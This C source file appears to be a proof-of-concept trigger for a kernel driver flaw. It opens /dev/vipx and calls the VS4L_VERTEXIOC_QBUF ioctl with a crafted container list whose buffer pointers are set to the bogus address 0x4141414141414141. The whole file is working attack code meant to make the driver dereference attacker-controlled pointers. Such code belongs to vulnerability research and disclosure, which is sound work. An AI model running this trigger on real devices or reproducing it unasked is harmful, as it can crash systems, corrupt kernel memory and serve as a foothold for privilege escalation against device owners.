#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <errno.h>
#include <string.h>
#include <sys/ioctl.h>

#define VS4L_VERTEXIOC_QBUF             _IOW('V', 6, struct vs4l_container_list)

#define MAX_NUM_OF_USER_PARAMS (180)

struct vs4l_container {
  uint32_t type;
  uint32_t target;
  uint32_t memory;
  uint32_t reserved[4];
  uint32_t count;
  struct vs4l_buffer *buffers;
};

struct vs4l_container_list {
  uint32_t direction;
  uint32_t id;
  uint32_t index;
  uint32_t flags;
  struct timeval timestamp[6];
  uint32_t count;
  uint32_t user_params[MAX_NUM_OF_USER_PARAMS];
  struct vs4l_container *containers;
};

int main(int argc, const char *argv[]) {
  errno = 0;
  int fd = open("/dev/vipx", O_RDWR);
  printf("open = %d: %d: %s\n", fd, errno, strerror(errno));
  struct vs4l_container containers[4] = {   // <- ucon
    [0] = { .count = 1, .buffers = (void *) 0x4141414141414141 },
    [1] = { .count = 1, .buffers = NULL },
    [2] = { .count = 1, .buffers = (void *) 0x4141414141414141 },
    [3] = { .count = 1, .buffers = NULL },
  };
  struct vs4l_container_list vcl = {
    .count      = 4,
    .containers = containers,
  };
  errno = 0;
  int ret = ioctl(fd, VS4L_VERTEXIOC_QBUF, &vcl);
  printf("ioctl = %d: %d: %s\n", ret, errno, strerror(errno));
  return 0;
}